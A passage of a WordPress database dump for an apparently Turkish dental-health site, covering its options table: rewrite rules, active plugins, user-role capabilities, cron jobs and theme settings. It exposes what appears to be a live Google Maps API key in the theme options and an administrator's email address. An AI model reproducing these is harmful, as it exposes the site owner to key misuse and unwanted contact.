rue\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:38:\"index.php?&page_id=8&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}', 'yes'),
(30, 'hack_file', '0', 'yes'),
(31, 'blog_charset', 'UTF-8', 'yes'),
(32, 'moderation_keys', '', 'no'),
(33, 'active_plugins', 'a:6:{i:0;s:41:\"Ultimate_VC_Addons/Ultimate_VC_Addons.php\";i:1;s:27:\"js_composer/js_composer.php\";i:2;s:23:\"revslider/revslider.php\";i:3;s:39:\"us-header-builder/us-header-builder.php\";i:4;s:23:\"wordfence/wordfence.php\";i:5;s:27:\"wp-super-cache/wp-cache.php\";}', 'yes'),
(34, 'category_base', '', 'yes'),
(35, 'ping_sites', 'http://rpc.pingomatic.com/', 'yes'),
(36, 'comment_max_links', '2', 'yes'),
(37, 'gmt_offset', '', 'yes'),
(38, 'default_email_category', '1', 'yes'),
(39, 'recently_edited', '', 'no'),
(40, 'template', 'Impreza', 'yes'),
(41, 'stylesheet', 'Impreza-child', 'yes'),
(42, 'comment_whitelist', '1', 'yes'),
(43, 'blacklist_keys', '', 'no'),
(44, 'comment_registration', '1', 'yes'),
(45, 'html_type', 'text/html', 'yes'),
(46, 'use_trackback', '0', 'yes'),
(47, 'default_role', 'subscriber', 'yes'),
(48, 'db_version', '45805', 'yes'),
(49, 'uploads_use_yearmonth_folders', '1', 'yes'),
(50, 'upload_path', '', 'yes'),
(51, 'blog_public', '1', 'yes'),
(52, 'default_link_category', '2', 'yes'),
(53, 'show_on_front', 'page', 'yes'),
(54, 'tag_base', '', 'yes'),
(55, 'show_avatars', '', 'yes'),
(56, 'avatar_rating', 'G', 'yes'),
(57, 'upload_url_path', '', 'yes'),
(58, 'thumbnail_size_w', '150', 'yes'),
(59, 'thumbnail_size_h', '150', 'yes'),
(60, 'thumbnail_crop', '1', 'yes'),
(61, 'medium_size_w', '300', 'yes'),
(62, 'medium_size_h', '300', 'yes'),
(63, 'avatar_default', 'mystery', 'yes'),
(64, 'large_size_w', '1024', 'yes'),
(65, 'large_size_h', '1024', 'yes'),
(66, 'image_default_link_type', 'none', 'yes'),
(67, 'image_default_size', '', 'yes'),
(68, 'image_default_align', '', 'yes'),
(69, 'close_comments_for_old_posts', '1', 'yes'),
(70, 'close_comments_days_old', '14', 'yes'),
(71, 'thread_comments', '1', 'yes'),
(72, 'thread_comments_depth', '5', 'yes'),
(73, 'page_comments', '', 'yes'),
(74, 'comments_per_page', '50', 'yes'),
(75, 'default_comments_page', 'newest', 'yes'),
(76, 'comment_order', 'asc', 'yes'),
(77, 'sticky_posts', 'a:0:{}', 'yes'),
(78, 'widget_categories', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(79, 'widget_text', 'a:2:{i:1;a:3:{s:5:\"title\";s:18:\"One More Question?\";s:4:\"text\";s:231:\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi sagittis, sem quis lacinia faucibus, orci ipsum gravida tortor, vel interdum mi sapien ut justo.\r\n\r\n[us_btn link=\"url:%2Fcontact%2F\" text=\"Contact Us\" style=\"outlined\"]\";s:6:\"filter\";b:1;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(80, 'widget_rss', 'a:0:{}', 'yes'),
(81, 'uninstall_plugins', 'a:2:{s:39:\"us-header-builder/us-header-builder.php\";s:14:\"ushb_uninstall\";s:27:\"wp-super-cache/wp-cache.php\";s:22:\"wpsupercache_uninstall\";}', 'no'),
(82, 'timezone_string', 'Europe/Istanbul', 'yes'),
(83, 'page_for_posts', '0', 'yes'),
(84, 'page_on_front', '8', 'yes'),
(85, 'default_post_format', '0', 'yes'),
(86, 'link_manager_enabled', '0', 'yes'),
(87, 'finished_splitting_shared_terms', '1', 'yes'),
(88, 'site_icon', '6556', 'yes'),
(89, 'medium_large_size_w', '768', 'yes'),
(90, 'medium_large_size_h', '0', 'yes'),
(91, 'initial_db_version', '38590', 'yes'),
(92, 'zdenl_user_roles', 'a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:117:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:17:\"edit_us_portfolio\";b:1;s:17:\"read_us_portfolio\";b:1;s:19:\"delete_us_portfolio\";b:1;s:18:\"edit_us_portfolios\";b:1;s:25:\"edit_others_us_portfolios\";b:1;s:21:\"publish_us_portfolios\";b:1;s:26:\"read_private_us_portfolios\";b:1;s:20:\"delete_us_portfolios\";b:1;s:28:\"delete_private_us_portfolios\";b:1;s:30:\"delete_published_us_portfolios\";b:1;s:27:\"delete_others_us_portfolios\";b:1;s:26:\"edit_private_us_portfolios\";b:1;s:28:\"edit_published_us_portfolios\";b:1;s:19:\"edit_us_testimonial\";b:1;s:19:\"read_us_testimonial\";b:1;s:21:\"delete_us_testimonial\";b:1;s:20:\"edit_us_testimonials\";b:1;s:27:\"edit_others_us_testimonials\";b:1;s:23:\"publish_us_testimonials\";b:1;s:28:\"read_private_us_testimonials\";b:1;s:22:\"delete_us_testimonials\";b:1;s:30:\"delete_private_us_testimonials\";b:1;s:32:\"delete_published_us_testimonials\";b:1;s:29:\"delete_others_us_testimonials\";b:1;s:28:\"edit_private_us_testimonials\";b:1;s:30:\"edit_published_us_testimonials\";b:1;s:14:\"edit_us_footer\";b:1;s:14:\"read_us_footer\";b:1;s:16:\"delete_us_footer\";b:1;s:15:\"edit_us_footers\";b:1;s:22:\"edit_others_us_footers\";b:1;s:18:\"publish_us_footers\";b:1;s:23:\"read_private_us_footers\";b:1;s:17:\"delete_us_footers\";b:1;s:25:\"delete_private_us_footers\";b:1;s:27:\"delete_published_us_footers\";b:1;s:24:\"delete_others_us_footers\";b:1;s:23:\"edit_private_us_footers\";b:1;s:25:\"edit_published_us_footers\";b:1;s:31:\"vc_access_rules_post_types/post\";b:1;s:31:\"vc_access_rules_post_types/page\";b:1;s:39:\"vc_access_rules_post_types/us_portfolio\";b:1;s:36:\"vc_access_rules_post_types/us_footer\";b:1;s:26:\"vc_access_rules_post_types\";s:6:\"custom\";s:30:\"vc_access_rules_backend_editor\";b:1;s:31:\"vc_access_rules_frontend_editor\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:24:\"vc_access_rules_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:1;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:69:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:17:\"edit_us_portfolio\";b:1;s:17:\"read_us_portfolio\";b:1;s:19:\"delete_us_portfolio\";b:1;s:18:\"edit_us_portfolios\";b:1;s:25:\"edit_others_us_portfolios\";b:1;s:21:\"publish_us_portfolios\";b:1;s:26:\"read_private_us_portfolios\";b:1;s:20:\"delete_us_portfolios\";b:1;s:28:\"delete_private_us_portfolios\";b:1;s:30:\"delete_published_us_portfolios\";b:1;s:27:\"delete_others_us_portfolios\";b:1;s:26:\"edit_private_us_portfolios\";b:1;s:28:\"edit_published_us_portfolios\";b:1;s:19:\"edit_us_testimonial\";b:1;s:19:\"read_us_testimonial\";b:1;s:21:\"delete_us_testimonial\";b:1;s:20:\"edit_us_testimonials\";b:1;s:27:\"edit_others_us_testimonials\";b:1;s:23:\"publish_us_testimonials\";b:1;s:28:\"read_private_us_testimonials\";b:1;s:22:\"delete_us_testimonials\";b:1;s:30:\"delete_private_us_testimonials\";b:1;s:32:\"delete_published_us_testimonials\";b:1;s:29:\"delete_others_us_testimonials\";b:1;s:28:\"edit_private_us_testimonials\";b:1;s:30:\"edit_published_us_testimonials\";b:1;s:26:\"vc_access_rules_post_types\";b:1;s:30:\"vc_access_rules_backend_editor\";b:1;s:31:\"vc_access_rules_frontend_editor\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:1;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:19:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:26:\"vc_access_rules_post_types\";b:1;s:30:\"vc_access_rules_backend_editor\";b:1;s:31:\"vc_access_rules_frontend_editor\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:1;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:14:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:26:\"vc_access_rules_post_types\";b:1;s:30:\"vc_access_rules_backend_editor\";b:1;s:31:\"vc_access_rules_frontend_editor\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:1;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}', 'yes'),
(93, 'fresh_site', '0', 'yes'),
(94, 'WPLANG', 'tr_TR', 'yes'),
(95, 'widget_search', 'a:2:{i:3;a:1:{s:5:\"title\";s:21:\"Find Something Useful\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(96, 'widget_recent-posts', 'a:3:{i:3;a:3:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:6;s:9:\"show_date\";b:1;}i:4;a:3:{s:5:\"title\";s:26:\"Ağız ve Diş Sağlığı\";s:6:\"number\";i:20;s:9:\"show_date\";b:0;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(97, 'widget_recent-comments', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(98, 'widget_archives', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(99, 'widget_meta', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(100, 'sidebars_widgets', 'a:5:{s:19:\"wp_inactive_widgets\";a:0:{}s:15:\"default_sidebar\";a:1:{i:0;s:14:\"recent-posts-4\";}s:9:\"sidebar-8\";a:3:{i:0;s:8:\"search-3\";i:1;s:6:\"text-1\";i:2;s:14:\"recent-posts-3\";}s:9:\"sidebar-9\";a:1:{i:0;s:10:\"us_login-1\";}s:13:\"array_version\";i:3;}', 'yes'),
(101, 'widget_pages', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(102, 'widget_calendar', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(103, 'widget_media_audio', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(104, 'widget_media_image', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(105, 'widget_media_gallery', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(106, 'widget_media_video', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(107, 'widget_tag_cloud', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(108, 'widget_nav_menu', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(109, 'widget_custom_html', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(110, 'cron', 'a:15:{i:1597053174;a:1:{s:11:\"wp_cache_gc\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1597054647;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1597055983;a:1:{s:21:\"wordfence_ls_ntp_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1597055990;a:1:{s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1597064400;a:1:{s:31:\"wordfence_email_activity_report\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1597066734;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1597066790;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1597068949;a:2:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1597068960;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1597074867;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1597139660;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"acb198e62473189dae31ff62084c8588\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;i:1597139660;}}}}i:1597398860;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"8e9b40630ec9d9683a9a6a55e7b55b0d\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;i:1597398860;}}}}i:1597658060;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"0aa1563f6d0366afa2c954547d022f97\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;i:1597658060;}}}}i:1597968698;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}s:7:\"version\";i:2;}', 'yes'),
(111, 'theme_mods_twentyseventeen', 'a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1531405158;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}', 'yes'),
(140, 'auto_core_update_notified', 'a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:21:\"markavincim@gmail.com\";s:7:\"version\";s:6:\"4.9.13\";s:9:\"timestamp\";i:1576204023;}', 'no'),
(144, 'recently_activated', 'a:1:{s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:1581341690;}', 'yes'),
(147, 'current_theme', 'Impreza Child', 'yes'),
(148, 'theme_mods_Impreza-child', 'a:3:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;}', 'yes'),
(149, 'theme_switched', '', 'yes'),
(150, 'us_license_activated', '1', 'yes'),
(151, 'us_db_version', '5.2.1', 'yes');
INSERT INTO `zdenl_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(152, 'usof_options_Impreza', 'a:359:{s:16:\"maintenance_mode\";s:1:\"0\";s:16:\"maintenance_page\";s:9:\"error-404\";s:15:\"maintenance_503\";i:0;s:9:\"site_icon\";s:9:\"6556|full\";s:9:\"preloader\";s:8:\"disabled\";s:15:\"preloader_image\";s:0:\"\";s:15:\"rounded_corners\";s:1:\"1\";s:15:\"links_underline\";s:1:\"0\";s:22:\"keyboard_accessibility\";i:0;s:11:\"back_to_top\";i:1;s:15:\"back_to_top_pos\";s:5:\"right\";s:17:\"back_to_top_color\";s:15:\"rgba(0,0,0,0.3)\";s:19:\"back_to_top_display\";i:100;s:22:\"smooth_scroll_duration\";i:1000;s:13:\"gmaps_api_key\";s:39:\"AIzaSyDi1RtnuYN7vfd02OJVmqFiBYqQEg62ZkA\";s:25:\"custom_post_types_support\";a:0:{}s:17:\"responsive_layout\";s:1:\"1\";s:13:\"canvas_layout\";s:4:\"wide\";s:13:\"color_body_bg\";s:7:\"#eeeeee\";s:13:\"body_bg_image\";s:0:\"\";s:18:\"body_bg_image_size\";s:7:\"initial\";s:20:\"body_bg_image_repeat\";s:6:\"repeat\";s:22:\"body_bg_image_position\";s:1